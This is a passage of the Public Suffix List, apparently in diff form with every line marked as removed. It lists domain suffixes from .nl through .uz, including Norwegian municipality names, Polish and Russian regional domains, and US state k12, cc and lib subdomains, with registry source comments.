dutch BV's (besloten vennootschap) -bv.nl - -// the co.nl domain is managed by CoDNS B.V. Added 2010-05-23. -co.nl - -// no : http://www.norid.no/regelverk/index.en.html -// The Norwegian registry has declined to notify us of updates. The web pages -// referenced below are the official source of the data. 
There is also an -// announce mailing list: -// https://postlister.uninett.no/sympa/info/norid-diskusjon -no -// Norid generic domains : http://www.norid.no/regelverk/vedlegg-c.en.html -fhs.no -vgs.no -fylkesbibl.no -folkebibl.no -museum.no -idrett.no -priv.no -// Non-Norid generic domains : http://www.norid.no/regelverk/vedlegg-d.en.html -mil.no -stat.no -dep.no -kommune.no -herad.no -// no geographical names : http://www.norid.no/regelverk/vedlegg-b.en.html -// counties -aa.no -ah.no -bu.no -fm.no -hl.no -hm.no -jan-mayen.no -mr.no -nl.no -nt.no -of.no -ol.no -oslo.no -rl.no -sf.no -st.no -svalbard.no -tm.no -tr.no -va.no -vf.no -// primary and lower secondary schools per county -gs.aa.no -gs.ah.no -gs.bu.no -gs.fm.no -gs.hl.no -gs.hm.no -gs.jan-mayen.no -gs.mr.no -gs.nl.no -gs.nt.no -gs.of.no -gs.ol.no -gs.oslo.no -gs.rl.no -gs.sf.no -gs.st.no -gs.svalbard.no -gs.tm.no -gs.tr.no -gs.va.no -gs.vf.no -// cities -akrehamn.no -åkrehamn.no -algard.no -ålgård.no -arna.no -brumunddal.no -bryne.no -bronnoysund.no -brønnøysund.no -drobak.no -drøbak.no -egersund.no -fetsund.no -floro.no -florø.no -fredrikstad.no -hokksund.no -honefoss.no -hønefoss.no -jessheim.no -jorpeland.no -jørpeland.no -kirkenes.no -kopervik.no -krokstadelva.no -langevag.no -langevåg.no -leirvik.no -mjondalen.no -mjøndalen.no -mo-i-rana.no -mosjoen.no -mosjøen.no -nesoddtangen.no -orkanger.no -osoyro.no -osøyro.no -raholt.no -råholt.no -sandnessjoen.no -sandnessjøen.no -skedsmokorset.no -slattum.no -spjelkavik.no -stathelle.no -stavern.no -stjordalshalsen.no -stjørdalshalsen.no -tananger.no -tranby.no -vossevangen.no -// communities -afjord.no -åfjord.no -agdenes.no -al.no -ål.no -alesund.no -ålesund.no -alstahaug.no -alta.no -áltá.no -alaheadju.no -álaheadju.no -alvdal.no -amli.no -åmli.no -amot.no -åmot.no -andebu.no -andoy.no -andøy.no -andasuolo.no -ardal.no -årdal.no -aremark.no -arendal.no -ås.no -aseral.no -åseral.no -asker.no -askim.no -askvoll.no -askoy.no -askøy.no -asnes.no -åsnes.no -audnedaln.no -aukra.no -aure.no -aurland.no -aurskog-holand.no -aurskog-høland.no -austevoll.no -austrheim.no -averoy.no -averøy.no -balestrand.no -ballangen.no -balat.no -bálát.no -balsfjord.no -bahccavuotna.no -báhccavuotna.no -bamble.no -bardu.no -beardu.no -beiarn.no -bajddar.no -bájddar.no -baidar.no -báidár.no -berg.no -bergen.no -berlevag.no -berlevåg.no -bearalvahki.no -bearalváhki.no -bindal.no -birkenes.no -bjarkoy.no -bjarkøy.no -bjerkreim.no -bjugn.no -bodo.no -bodø.no -badaddja.no -bådåddjå.no -budejju.no -bokn.no -bremanger.no -bronnoy.no -brønnøy.no -bygland.no -bykle.no -barum.no -bærum.no -bo.telemark.no -bø.telemark.no -bo.nordland.no -bø.nordland.no -bievat.no -bievát.no -bomlo.no -bømlo.no -batsfjord.no -båtsfjord.no -bahcavuotna.no -báhcavuotna.no -dovre.no -drammen.no -drangedal.no -dyroy.no -dyrøy.no -donna.no -dønna.no -eid.no -eidfjord.no -eidsberg.no -eidskog.no -eidsvoll.no -eigersund.no -elverum.no -enebakk.no -engerdal.no -etne.no -etnedal.no -evenes.no -evenassi.no -evenášši.no -evje-og-hornnes.no -farsund.no -fauske.no -fuossko.no -fuoisku.no -fedje.no -fet.no -finnoy.no -finnøy.no -fitjar.no -fjaler.no -fjell.no -flakstad.no -flatanger.no -flekkefjord.no -flesberg.no -flora.no -fla.no -flå.no -folldal.no -forsand.no -fosnes.no -frei.no -frogn.no -froland.no -frosta.no -frana.no -fræna.no -froya.no -frøya.no -fusa.no -fyresdal.no -forde.no -førde.no -gamvik.no -gangaviika.no -gáŋgaviika.no -gaular.no -gausdal.no -gildeskal.no -gildeskål.no -giske.no -gjemnes.no -gjerdrum.no -gjerstad.no -gjesdal.no 
-gjovik.no -gjøvik.no -gloppen.no -gol.no -gran.no -grane.no -granvin.no -gratangen.no -grimstad.no -grong.no -kraanghke.no -kråanghke.no -grue.no -gulen.no -hadsel.no -halden.no -halsa.no -hamar.no -hamaroy.no -habmer.no -hábmer.no -hapmir.no -hápmir.no -hammerfest.no -hammarfeasta.no -hámmárfeasta.no -haram.no -hareid.no -harstad.no -hasvik.no -aknoluokta.no -ákŋoluokta.no -hattfjelldal.no -aarborte.no -haugesund.no -hemne.no -hemnes.no -hemsedal.no -heroy.more-og-romsdal.no -herøy.møre-og-romsdal.no -heroy.nordland.no -herøy.nordland.no -hitra.no -hjartdal.no -hjelmeland.no -hobol.no -hobøl.no -hof.no -hol.no -hole.no -holmestrand.no -holtalen.no -holtålen.no -hornindal.no -horten.no -hurdal.no -hurum.no -hvaler.no -hyllestad.no -hagebostad.no -hægebostad.no -hoyanger.no -høyanger.no -hoylandet.no -høylandet.no -ha.no -hå.no -ibestad.no -inderoy.no -inderøy.no -iveland.no -jevnaker.no -jondal.no -jolster.no -jølster.no -karasjok.no -karasjohka.no -kárášjohka.no -karlsoy.no -galsa.no -gálsá.no -karmoy.no -karmøy.no -kautokeino.no -guovdageaidnu.no -klepp.no -klabu.no -klæbu.no -kongsberg.no -kongsvinger.no -kragero.no -kragerø.no -kristiansand.no -kristiansund.no -krodsherad.no -krødsherad.no -kvalsund.no -rahkkeravju.no -ráhkkerávju.no -kvam.no -kvinesdal.no -kvinnherad.no -kviteseid.no -kvitsoy.no -kvitsøy.no -kvafjord.no -kvæfjord.no -giehtavuoatna.no -kvanangen.no -kvænangen.no -navuotna.no -návuotna.no -kafjord.no -kåfjord.no -gaivuotna.no -gáivuotna.no -larvik.no -lavangen.no -lavagis.no -loabat.no -loabát.no -lebesby.no -davvesiida.no -leikanger.no -leirfjord.no -leka.no -leksvik.no -lenvik.no -leangaviika.no -leaŋgaviika.no -lesja.no -levanger.no -lier.no -lierne.no -lillehammer.no -lillesand.no -lindesnes.no -lindas.no -lindås.no -lom.no -loppa.no -lahppi.no -láhppi.no -lund.no -lunner.no -luroy.no -lurøy.no -luster.no -lyngdal.no -lyngen.no -ivgu.no -lardal.no -lerdal.no -lærdal.no -lodingen.no -lødingen.no -lorenskog.no -lørenskog.no -loten.no -løten.no -malvik.no -masoy.no -måsøy.no -muosat.no -muosát.no -mandal.no -marker.no -marnardal.no -masfjorden.no -meland.no -meldal.no -melhus.no -meloy.no -meløy.no -meraker.no -meråker.no -moareke.no -moåreke.no -midsund.no -midtre-gauldal.no -modalen.no -modum.no -molde.no -moskenes.no -moss.no -mosvik.no -malselv.no -målselv.no -malatvuopmi.no -málatvuopmi.no -namdalseid.no -aejrie.no -namsos.no -namsskogan.no -naamesjevuemie.no -nååmesjevuemie.no -laakesvuemie.no -nannestad.no -narvik.no -narviika.no -naustdal.no -nedre-eiker.no -nes.akershus.no -nes.buskerud.no -nesna.no -nesodden.no -nesseby.no -unjarga.no -unjárga.no -nesset.no -nissedal.no -nittedal.no -nord-aurdal.no -nord-fron.no -nord-odal.no -norddal.no -nordkapp.no -davvenjarga.no -davvenjárga.no -nordre-land.no -nordreisa.no -raisa.no -ráisa.no -nore-og-uvdal.no -notodden.no -naroy.no -nærøy.no -notteroy.no -nøtterøy.no -odda.no -oksnes.no -øksnes.no -oppdal.no -oppegard.no -oppegård.no -orkdal.no -orland.no -ørland.no -orskog.no -ørskog.no -orsta.no -ørsta.no -os.hedmark.no -os.hordaland.no -osen.no -osteroy.no -osterøy.no -ostre-toten.no -østre-toten.no -overhalla.no -ovre-eiker.no -øvre-eiker.no -oyer.no -øyer.no -oygarden.no -øygarden.no -oystre-slidre.no -øystre-slidre.no -porsanger.no -porsangu.no -porsáŋgu.no -porsgrunn.no -radoy.no -radøy.no -rakkestad.no -rana.no -ruovat.no -randaberg.no -rauma.no -rendalen.no -rennebu.no -rennesoy.no -rennesøy.no -rindal.no -ringebu.no -ringerike.no -ringsaker.no -rissa.no -risor.no -risør.no -roan.no -rollag.no -rygge.no 
-ralingen.no -rælingen.no -rodoy.no -rødøy.no -romskog.no -rømskog.no -roros.no -røros.no -rost.no -røst.no -royken.no -røyken.no -royrvik.no -røyrvik.no -rade.no -råde.no -salangen.no -siellak.no -saltdal.no -salat.no -sálát.no -sálat.no -samnanger.no -sande.more-og-romsdal.no -sande.møre-og-romsdal.no -sande.vestfold.no -sandefjord.no -sandnes.no -sandoy.no -sandøy.no -sarpsborg.no -sauda.no -sauherad.no -sel.no -selbu.no -selje.no -seljord.no -sigdal.no -siljan.no -sirdal.no -skaun.no -skedsmo.no -ski.no -skien.no -skiptvet.no -skjervoy.no -skjervøy.no -skierva.no -skiervá.no -skjak.no -skjåk.no -skodje.no -skanland.no -skånland.no -skanit.no -skánit.no -smola.no -smøla.no -snillfjord.no -snasa.no -snåsa.no -snoasa.no -snaase.no -snåase.no -sogndal.no -sokndal.no -sola.no -solund.no -songdalen.no -sortland.no -spydeberg.no -stange.no -stavanger.no -steigen.no -steinkjer.no -stjordal.no -stjørdal.no -stokke.no -stor-elvdal.no -stord.no -stordal.no -storfjord.no -omasvuotna.no -strand.no -stranda.no -stryn.no -sula.no -suldal.no -sund.no -sunndal.no -surnadal.no -sveio.no -svelvik.no -sykkylven.no -sogne.no -søgne.no -somna.no -sømna.no -sondre-land.no -søndre-land.no -sor-aurdal.no -sør-aurdal.no -sor-fron.no -sør-fron.no -sor-odal.no -sør-odal.no -sor-varanger.no -sør-varanger.no -matta-varjjat.no -mátta-várjjat.no -sorfold.no -sørfold.no -sorreisa.no -sørreisa.no -sorum.no -sørum.no -tana.no -deatnu.no -time.no -tingvoll.no -tinn.no -tjeldsund.no -dielddanuorri.no -tjome.no -tjøme.no -tokke.no -tolga.no -torsken.no -tranoy.no -tranøy.no -tromso.no -tromsø.no -tromsa.no -romsa.no -trondheim.no -troandin.no -trysil.no -trana.no -træna.no -trogstad.no -trøgstad.no -tvedestrand.no -tydal.no -tynset.no -tysfjord.no -divtasvuodna.no -divttasvuotna.no -tysnes.no -tysvar.no -tysvær.no -tonsberg.no -tønsberg.no -ullensaker.no -ullensvang.no -ulvik.no -utsira.no -vadso.no -vadsø.no -cahcesuolo.no -čáhcesuolo.no -vaksdal.no -valle.no -vang.no -vanylven.no -vardo.no -vardø.no -varggat.no -várggát.no -vefsn.no -vaapste.no -vega.no -vegarshei.no -vegårshei.no -vennesla.no -verdal.no -verran.no -vestby.no -vestnes.no -vestre-slidre.no -vestre-toten.no -vestvagoy.no -vestvågøy.no -vevelstad.no -vik.no -vikna.no -vindafjord.no -volda.no -voss.no -varoy.no -værøy.no -vagan.no -vågan.no -voagat.no -vagsoy.no -vågsøy.no -vaga.no -vågå.no -valer.ostfold.no -våler.østfold.no -valer.hedmark.no -våler.hedmark.no - -// the co.no domain is managed by CoDNS B.V. Added 2010-05-23. -co.no - -// np : http://www.mos.com.np/register.html -*.np - -// nr : http://cenpac.net.nr/dns/index.html -// Confirmed by registry 2008-06-17 -nr -biz.nr -info.nr -gov.nr -edu.nr -org.nr -net.nr -com.nr - -// nu : http://en.wikipedia.org/wiki/.nu -nu - -// nz : http://en.wikipedia.org/wiki/.nz -*.nz - -// om : http://en.wikipedia.org/wiki/.om -*.om -!mediaphone.om -!nawrastelecom.om -!nawras.om -!omanmobile.om -!omanpost.om -!omantel.om -!rakpetroleum.om -!siemens.om -!songfest.om -!statecouncil.om - -// org : http://en.wikipedia.org/wiki/.org -org - -// CentralNic names : http://www.centralnic.com/names/domains -// Submitted by registry 2008-06-17 -ae.org - -// ZaNiC names : http://www.za.net/ -// Confirmed by registry 2009-10-03 -za.org - -// pa : http://www.nic.pa/ -// Some additional second level "domains" resolve directly as hostnames, such as -// pannet.pa, so we add a rule for "pa". 
-pa -ac.pa -gob.pa -com.pa -org.pa -sld.pa -edu.pa -net.pa -ing.pa -abo.pa -med.pa -nom.pa - -// pe : https://www.nic.pe/InformeFinalComision.pdf -pe -edu.pe -gob.pe -nom.pe -mil.pe -org.pe -com.pe -net.pe - -// pf : http://www.gobin.info/domainname/formulaire-pf.pdf -pf -com.pf -org.pf -edu.pf - -// pg : http://en.wikipedia.org/wiki/.pg -*.pg - -// ph : http://www.domains.ph/FAQ2.asp -// Submitted by registry 2008-06-13 -ph -com.ph -net.ph -org.ph -gov.ph -edu.ph -ngo.ph -mil.ph -i.ph - -// pk : http://pk5.pknic.net.pk/pk5/msgNamepk.PK -pk -com.pk -net.pk -edu.pk -org.pk -fam.pk -biz.pk -web.pk -gov.pk -gob.pk -gok.pk -gon.pk -gop.pk -gos.pk -info.pk - -// pl : http://www.dns.pl/english/ -pl -// NASK functional domains (nask.pl / dns.pl) : http://www.dns.pl/english/dns-funk.html -aid.pl -agro.pl -atm.pl -auto.pl -biz.pl -com.pl -edu.pl -gmina.pl -gsm.pl -info.pl -mail.pl -miasta.pl -media.pl -mil.pl -net.pl -nieruchomosci.pl -nom.pl -org.pl -pc.pl -powiat.pl -priv.pl -realestate.pl -rel.pl -sex.pl -shop.pl -sklep.pl -sos.pl -szkola.pl -targi.pl -tm.pl -tourism.pl -travel.pl -turystyka.pl -// ICM functional domains (icm.edu.pl) -6bone.pl -art.pl -mbone.pl -// Government domains (administred by ippt.gov.pl) -gov.pl -uw.gov.pl -um.gov.pl -ug.gov.pl -upow.gov.pl -starostwo.gov.pl -so.gov.pl -sr.gov.pl -po.gov.pl -pa.gov.pl -// other functional domains -ngo.pl -irc.pl -usenet.pl -// NASK geographical domains : http://www.dns.pl/english/dns-regiony.html -augustow.pl -babia-gora.pl -bedzin.pl -beskidy.pl -bialowieza.pl -bialystok.pl -bielawa.pl -bieszczady.pl -boleslawiec.pl -bydgoszcz.pl -bytom.pl -cieszyn.pl -czeladz.pl -czest.pl -dlugoleka.pl -elblag.pl -elk.pl -glogow.pl -gniezno.pl -gorlice.pl -grajewo.pl -ilawa.pl -jaworzno.pl -jelenia-gora.pl -jgora.pl -kalisz.pl -kazimierz-dolny.pl -karpacz.pl -kartuzy.pl -kaszuby.pl -katowice.pl -kepno.pl -ketrzyn.pl -klodzko.pl -kobierzyce.pl -kolobrzeg.pl -konin.pl -konskowola.pl -kutno.pl -lapy.pl -lebork.pl -legnica.pl -lezajsk.pl -limanowa.pl -lomza.pl -lowicz.pl -lubin.pl -lukow.pl -malbork.pl -malopolska.pl -mazowsze.pl -mazury.pl -mielec.pl -mielno.pl -mragowo.pl -naklo.pl -nowaruda.pl -nysa.pl -olawa.pl -olecko.pl -olkusz.pl -olsztyn.pl -opoczno.pl -opole.pl -ostroda.pl -ostroleka.pl -ostrowiec.pl -ostrowwlkp.pl -pila.pl -pisz.pl -podhale.pl -podlasie.pl -polkowice.pl -pomorze.pl -pomorskie.pl -prochowice.pl -pruszkow.pl -przeworsk.pl -pulawy.pl -radom.pl -rawa-maz.pl -rybnik.pl -rzeszow.pl -sanok.pl -sejny.pl -siedlce.pl -slask.pl -slupsk.pl -sosnowiec.pl -stalowa-wola.pl -skoczow.pl -starachowice.pl -stargard.pl -suwalki.pl -swidnica.pl -swiebodzin.pl -swinoujscie.pl -szczecin.pl -szczytno.pl -tarnobrzeg.pl -tgory.pl -turek.pl -tychy.pl -ustka.pl -walbrzych.pl -warmia.pl -warszawa.pl -waw.pl -wegrow.pl -wielun.pl -wlocl.pl -wloclawek.pl -wodzislaw.pl -wolomin.pl -wroclaw.pl -zachpomor.pl -zagan.pl -zarow.pl -zgora.pl -zgorzelec.pl -// TASK geographical domains (www.task.gda.pl/uslugi/dns) -gda.pl -gdansk.pl -gdynia.pl -med.pl -sopot.pl -// other geographical domains -gliwice.pl -krakow.pl -poznan.pl -wroc.pl -zakopane.pl - -// co.pl : Mainseek Sp. z o.o. 
http://www.co.pl -co.pl - -// pn : http://www.government.pn/PnRegistry/policies.htm -pn -gov.pn -co.pn -org.pn -edu.pn -net.pn - -// pr : http://www.nic.pr/index.asp?f=1 -pr -com.pr -net.pr -org.pr -gov.pr -edu.pr -isla.pr -pro.pr -biz.pr -info.pr -name.pr -// these aren't mentioned on nic.pr, but on http://en.wikipedia.org/wiki/.pr -est.pr -prof.pr -ac.pr - -// pro : http://www.nic.pro/support_faq.htm -pro -aca.pro -bar.pro -cpa.pro -jur.pro -law.pro -med.pro -eng.pro - -// ps : http://en.wikipedia.org/wiki/.ps -// http://www.nic.ps/registration/policy.html#reg -ps -edu.ps -gov.ps -sec.ps -plo.ps -com.ps -org.ps -net.ps - -// pt : http://online.dns.pt/dns/start_dns -pt -net.pt -gov.pt -org.pt -edu.pt -int.pt -publ.pt -com.pt -nome.pt - -// pw : http://en.wikipedia.org/wiki/.pw -pw -co.pw -ne.pw -or.pw -ed.pw -go.pw -belau.pw - -// py : http://www.nic.py/faq_a.html#faq_b -*.py - -// qa : http://www.qatar.net.qa/services/virtual.htm -*.qa - -// re : http://www.afnic.re/obtenir/chartes/nommage-re/annexe-descriptifs -re -com.re -asso.re -nom.re - -// ro : http://www.rotld.ro/ -ro -com.ro -org.ro -tm.ro -nt.ro -nom.ro -info.ro -rec.ro -arts.ro -firm.ro -store.ro -www.ro - -// rs : http://en.wikipedia.org/wiki/.rs -rs -co.rs -org.rs -edu.rs -ac.rs -gov.rs -in.rs - -// ru : http://www.cctld.ru/ru/docs/aktiv_8.php -// Industry domains -ru -ac.ru -com.ru -edu.ru -int.ru -net.ru -org.ru -pp.ru -// Geographical domains -adygeya.ru -altai.ru -amur.ru -arkhangelsk.ru -astrakhan.ru -bashkiria.ru -belgorod.ru -bir.ru -bryansk.ru -buryatia.ru -cbg.ru -chel.ru -chelyabinsk.ru -chita.ru -chukotka.ru -chuvashia.ru -dagestan.ru -dudinka.ru -e-burg.ru -grozny.ru -irkutsk.ru -ivanovo.ru -izhevsk.ru -jar.ru -joshkar-ola.ru -kalmykia.ru -kaluga.ru -kamchatka.ru -karelia.ru -kazan.ru -kchr.ru -kemerovo.ru -khabarovsk.ru -khakassia.ru -khv.ru -kirov.ru -koenig.ru -komi.ru -kostroma.ru -krasnoyarsk.ru -kuban.ru -kurgan.ru -kursk.ru -lipetsk.ru -magadan.ru -mari.ru -mari-el.ru -marine.ru -mordovia.ru -mosreg.ru -msk.ru -murmansk.ru -nalchik.ru -nnov.ru -nov.ru -novosibirsk.ru -nsk.ru -omsk.ru -orenburg.ru -oryol.ru -palana.ru -penza.ru -perm.ru -pskov.ru -ptz.ru -rnd.ru -ryazan.ru -sakhalin.ru -samara.ru -saratov.ru -simbirsk.ru -smolensk.ru -spb.ru -stavropol.ru -stv.ru -surgut.ru -tambov.ru -tatarstan.ru -tom.ru -tomsk.ru -tsaritsyn.ru -tsk.ru -tula.ru -tuva.ru -tver.ru -tyumen.ru -udm.ru -udmurtia.ru -ulan-ude.ru -vladikavkaz.ru -vladimir.ru -vladivostok.ru -volgograd.ru -vologda.ru -voronezh.ru -vrn.ru -vyatka.ru -yakutia.ru -yamal.ru -yaroslavl.ru -yekaterinburg.ru -yuzhno-sakhalinsk.ru -// More geographical domains -amursk.ru -baikal.ru -cmw.ru -fareast.ru -jamal.ru -kms.ru -k-uralsk.ru -kustanai.ru -kuzbass.ru -magnitka.ru -mytis.ru -nakhodka.ru -nkz.ru -norilsk.ru -oskol.ru -pyatigorsk.ru -rubtsovsk.ru -snz.ru -syzran.ru -vdonsk.ru -zgrad.ru -// State domains -gov.ru -mil.ru -// Technical domains -test.ru - -// rw : http://www.nic.rw/cgi-bin/policy.pl -rw -gov.rw -net.rw -edu.rw -ac.rw -com.rw -co.rw -int.rw -mil.rw -gouv.rw - -// sa : http://www.nic.net.sa/ -sa -com.sa -net.sa -org.sa -gov.sa -med.sa -pub.sa -edu.sa -sch.sa - -// sb : http://www.sbnic.net.sb/ -// Submitted by registry 2008-06-08 -sb -com.sb -edu.sb -gov.sb -net.sb -org.sb - -// sc : http://www.nic.sc/ -sc -com.sc -gov.sc -net.sc -org.sc -edu.sc - -// sd : http://www.isoc.sd/sudanic.isoc.sd/billing_pricing.htm -// Submitted by registry 2008-06-17 -sd -com.sd -net.sd -org.sd -edu.sd -med.sd -gov.sd -info.sd - -// se : 
http://en.wikipedia.org/wiki/.se -// Submitted by registry 2008-06-24 -se -a.se -ac.se -b.se -bd.se -brand.se -c.se -d.se -e.se -f.se -fh.se -fhsk.se -fhv.se -g.se -h.se -i.se -k.se -komforb.se -kommunalforbund.se -komvux.se -l.se -lanbib.se -m.se -n.se -naturbruksgymn.se -o.se -org.se -p.se -parti.se -pp.se -press.se -r.se -s.se -sshn.se -t.se -tm.se -u.se -w.se -x.se -y.se -z.se - -// sg : http://www.nic.net.sg/sub_policies_agreement/2ld.html -sg -com.sg -net.sg -org.sg -gov.sg -edu.sg -per.sg - -// sh : http://www.nic.sh/rules.html -// list of 2nd level domains ? -sh - -// si : http://en.wikipedia.org/wiki/.si -si - -// sj : No registrations at this time. -// Submitted by registry 2008-06-16 - -// sk : http://en.wikipedia.org/wiki/.sk -// list of 2nd level domains ? -sk - -// sl : http://www.nic.sl -// Submitted by registry 2008-06-12 -sl -com.sl -net.sl -edu.sl -gov.sl -org.sl - -// sm : http://en.wikipedia.org/wiki/.sm -sm - -// sn : http://en.wikipedia.org/wiki/.sn -sn -art.sn -com.sn -edu.sn -gouv.sn -org.sn -perso.sn -univ.sn - -// so : http://www.soregistry.com/ -so -com.so -net.so -org.so - -// sr : http://en.wikipedia.org/wiki/.sr -sr - -// st : http://www.nic.st/html/policyrules/ -st -co.st -com.st -consulado.st -edu.st -embaixada.st -gov.st -mil.st -net.st -org.st -principe.st -saotome.st -store.st - -// su : http://en.wikipedia.org/wiki/.su -su - -// sv : http://www.svnet.org.sv/svpolicy.html -*.sv - -// sy : http://en.wikipedia.org/wiki/.sy -// see also: http://www.gobin.info/domainname/sy.doc -sy -edu.sy -gov.sy -net.sy -mil.sy -com.sy -org.sy - -// sz : http://en.wikipedia.org/wiki/.sz -// http://www.sispa.org.sz/ -sz -co.sz -ac.sz -org.sz - -// tc : http://en.wikipedia.org/wiki/.tc -tc - -// td : http://en.wikipedia.org/wiki/.td -td - -// tel: http://en.wikipedia.org/wiki/.tel -// http://www.telnic.org/ -tel - -// tf : http://en.wikipedia.org/wiki/.tf -tf - -// tg : http://en.wikipedia.org/wiki/.tg -// http://www.nic.tg/nictg/index.php implies no reserved 2nd-level domains, -// although this contradicts wikipedia. -tg - -// th : http://en.wikipedia.org/wiki/.th -// Submitted by registry 2008-06-17 -th -ac.th -co.th -go.th -in.th -mi.th -net.th -or.th - -// tj : http://www.nic.tj/policy.htm -tj -ac.tj -biz.tj -co.tj -com.tj -edu.tj -go.tj -gov.tj -int.tj -mil.tj -name.tj -net.tj -nic.tj -org.tj -test.tj -web.tj - -// tk : http://en.wikipedia.org/wiki/.tk -tk - -// tl : http://en.wikipedia.org/wiki/.tl -tl -gov.tl - -// tm : http://www.nic.tm/rules.html -// list of 2nd level tlds ? -tm - -// tn : http://en.wikipedia.org/wiki/.tn -// http://whois.ati.tn/ -tn -com.tn -ens.tn -fin.tn -gov.tn -ind.tn -intl.tn -nat.tn -net.tn -org.tn -info.tn -perso.tn -tourism.tn -edunet.tn -rnrt.tn -rns.tn -rnu.tn -mincom.tn -agrinet.tn -defense.tn -turen.tn - -// to : http://en.wikipedia.org/wiki/.to -// Submitted by registry 2008-06-17 -to -com.to -gov.to -net.to -org.to -edu.to -mil.to - -// tr : http://en.wikipedia.org/wiki/.tr -*.tr -!nic.tr -// Used by government in the TRNC -// http://en.wikipedia.org/wiki/.nc.tr -gov.nc.tr - -// travel : http://en.wikipedia.org/wiki/.travel -travel - -// tt : http://www.nic.tt/ -tt -co.tt -com.tt -org.tt -net.tt -biz.tt -info.tt -pro.tt -int.tt -coop.tt -jobs.tt -mobi.tt -travel.tt -museum.tt -aero.tt -name.tt -gov.tt -edu.tt - -// tv : http://en.wikipedia.org/wiki/.tv -// Not listing any 2LDs as reserved since none seem to exist in practice, -// Wikipedia notwithstanding. 
-tv - -// tw : http://en.wikipedia.org/wiki/.tw -tw -edu.tw -gov.tw -mil.tw -com.tw -net.tw -org.tw -idv.tw -game.tw -ebiz.tw -club.tw -網路.tw -組織.tw -商業.tw - -// tz : http://en.wikipedia.org/wiki/.tz -// Submitted by registry 2008-06-17 -// Updated from http://www.tznic.or.tz/index.php/domains.html 2010-10-25 -ac.tz -co.tz -go.tz -mil.tz -ne.tz -or.tz -sc.tz - -// ua : http://www.nic.net.ua/ -ua -com.ua -edu.ua -gov.ua -in.ua -net.ua -org.ua -// ua geo-names -cherkassy.ua -chernigov.ua -chernovtsy.ua -ck.ua -cn.ua -crimea.ua -cv.ua -dn.ua -dnepropetrovsk.ua -donetsk.ua -dp.ua -if.ua -ivano-frankivsk.ua -kh.ua -kharkov.ua -kherson.ua -khmelnitskiy.ua -kiev.ua -kirovograd.ua -km.ua -kr.ua -ks.ua -kv.ua -lg.ua -lugansk.ua -lutsk.ua -lviv.ua -mk.ua -nikolaev.ua -od.ua -odessa.ua -pl.ua -poltava.ua -rovno.ua -rv.ua -sebastopol.ua -sumy.ua -te.ua -ternopil.ua -uzhgorod.ua -vinnica.ua -vn.ua -zaporizhzhe.ua -zp.ua -zhitomir.ua -zt.ua - -// ug : http://www.registry.co.ug/ -ug -co.ug -ac.ug -sc.ug -go.ug -ne.ug -or.ug - -// uk : http://en.wikipedia.org/wiki/.uk -*.uk -*.sch.uk -!bl.uk -!british-library.uk -!icnet.uk -!gov.uk -!jet.uk -!mod.uk -!nel.uk -!nhs.uk -!nic.uk -!nls.uk -!national-library-scotland.uk -!parliament.uk -!police.uk - -// us : http://en.wikipedia.org/wiki/.us -us -dni.us -fed.us -isa.us -kids.us -nsn.us -// us geographic names -ak.us -al.us -ar.us -as.us -az.us -ca.us -co.us -ct.us -dc.us -de.us -fl.us -ga.us -gu.us -hi.us -ia.us -id.us -il.us -in.us -ks.us -ky.us -la.us -ma.us -md.us -me.us -mi.us -mn.us -mo.us -ms.us -mt.us -nc.us -nd.us -ne.us -nh.us -nj.us -nm.us -nv.us -ny.us -oh.us -ok.us -or.us -pa.us -pr.us -ri.us -sc.us -sd.us -tn.us -tx.us -ut.us -vi.us -vt.us -va.us -wa.us -wi.us -wv.us -wy.us -// The registrar notes several more specific domains available in each state, -// such as state.*.us, dst.*.us, etc., but resolution of these is somewhat -// haphazard; in some states these domains resolve as addresses, while in others -// only subdomains are available, or even nothing at all. We include the -// most common ones where it's clear that different sites are different -// entities. 
-k12.ak.us -k12.al.us -k12.ar.us -k12.as.us -k12.az.us -k12.ca.us -k12.co.us -k12.ct.us -k12.dc.us -k12.de.us -k12.fl.us -k12.ga.us -k12.gu.us -// k12.hi.us Hawaii has a state-wide DOE login: bug 614565 -k12.ia.us -k12.id.us -k12.il.us -k12.in.us -k12.ks.us -k12.ky.us -k12.la.us -k12.ma.us -k12.md.us -k12.me.us -k12.mi.us -k12.mn.us -k12.mo.us -k12.ms.us -k12.mt.us -k12.nc.us -k12.nd.us -k12.ne.us -k12.nh.us -k12.nj.us -k12.nm.us -k12.nv.us -k12.ny.us -k12.oh.us -k12.ok.us -k12.or.us -k12.pa.us -k12.pr.us -k12.ri.us -k12.sc.us -k12.sd.us -k12.tn.us -k12.tx.us -k12.ut.us -k12.vi.us -k12.vt.us -k12.va.us -k12.wa.us -k12.wi.us -k12.wv.us -k12.wy.us - -cc.ak.us -cc.al.us -cc.ar.us -cc.as.us -cc.az.us -cc.ca.us -cc.co.us -cc.ct.us -cc.dc.us -cc.de.us -cc.fl.us -cc.ga.us -cc.gu.us -cc.hi.us -cc.ia.us -cc.id.us -cc.il.us -cc.in.us -cc.ks.us -cc.ky.us -cc.la.us -cc.ma.us -cc.md.us -cc.me.us -cc.mi.us -cc.mn.us -cc.mo.us -cc.ms.us -cc.mt.us -cc.nc.us -cc.nd.us -cc.ne.us -cc.nh.us -cc.nj.us -cc.nm.us -cc.nv.us -cc.ny.us -cc.oh.us -cc.ok.us -cc.or.us -cc.pa.us -cc.pr.us -cc.ri.us -cc.sc.us -cc.sd.us -cc.tn.us -cc.tx.us -cc.ut.us -cc.vi.us -cc.vt.us -cc.va.us -cc.wa.us -cc.wi.us -cc.wv.us -cc.wy.us - -lib.ak.us -lib.al.us -lib.ar.us -lib.as.us -lib.az.us -lib.ca.us -lib.co.us -lib.ct.us -lib.dc.us -lib.de.us -lib.fl.us -lib.ga.us -lib.gu.us -lib.hi.us -lib.ia.us -lib.id.us -lib.il.us -lib.in.us -lib.ks.us -lib.ky.us -lib.la.us -lib.ma.us -lib.md.us -lib.me.us -lib.mi.us -lib.mn.us -lib.mo.us -lib.ms.us -lib.mt.us -lib.nc.us -lib.nd.us -lib.ne.us -lib.nh.us -lib.nj.us -lib.nm.us -lib.nv.us -lib.ny.us -lib.oh.us -lib.ok.us -lib.or.us -lib.pa.us -lib.pr.us -lib.ri.us -lib.sc.us -lib.sd.us -lib.tn.us -lib.tx.us -lib.ut.us -lib.vi.us -lib.vt.us -lib.va.us -lib.wa.us -lib.wi.us -lib.wv.us -lib.wy.us - -// k12.ma.us contains school districts in Massachusetts. The 4LDs are -// managed indepedently except for private (PVT), charter (CHTR) and -// parochial (PAROCH) schools. Those are delegated dorectly to the -// 5LD operators. -pvt.k12.ma.us -chtr.k12.ma.us -paroch.k12.ma.us - -// uy : http://www.antel.com.uy/ -*.uy - -// uz : http://www.reg.uz/registerr.html -// are there other 2nd level tlds ? -uz -com.uz -co.uz 